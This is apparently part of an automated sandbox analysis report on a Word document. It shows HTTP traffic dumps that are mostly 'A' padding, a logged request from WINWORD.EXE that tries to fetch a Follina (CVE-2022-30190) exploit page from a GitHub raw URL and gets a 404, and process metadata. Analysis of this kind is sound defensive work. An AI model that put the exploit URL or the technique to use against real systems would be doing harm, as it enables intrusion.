                                                                                                                                                                                                                                        Data Ascii: BBBBBBBBBBDVDVDV//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC90INData Raw: 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                        Data Ascii: AAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC91INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC93INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC94INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        9192.168.2.449713185.199.109.133443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC95OUTHEAD /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1
                                                                                                                                                                                                                                        Authorization: Bearer
                                                                                                                                                                                                                                        X-MS-CookieUri-Requested: t
                                                                                                                                                                                                                                        X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                                                        User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2022-08-18 01:57:10 UTC96INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Length: 14
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:10 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6925-MXP
                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                        X-Cache-Hits: 2
                                                                                                                                                                                                                                        X-Timer: S1660787830.367433,VS0,VE0
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: f1cb60f7c941317068e3e73d7fbbe8ce8a5f2458
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:10 GMT
                                                                                                                                                                                                                                        Source-Age: 5


                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:03:56:59
                                                                                                                                                                                                                                        Start date:18/08/2022
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                                                                                        Imagebase:0x320000
                                                                                                                                                                                                                                        File size:1937688 bytes
                                                                                                                                                                                                                                        MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                        Start time:03:57:04
                                                                                                                                                                                                                                        Start date:18/08/2022
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                                                                                        Imagebase:0x960000
                                                                                                                                                                                                                                        File size:466688 bytes
                                                                                                                                                                                                                                        MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                                                        No disassembly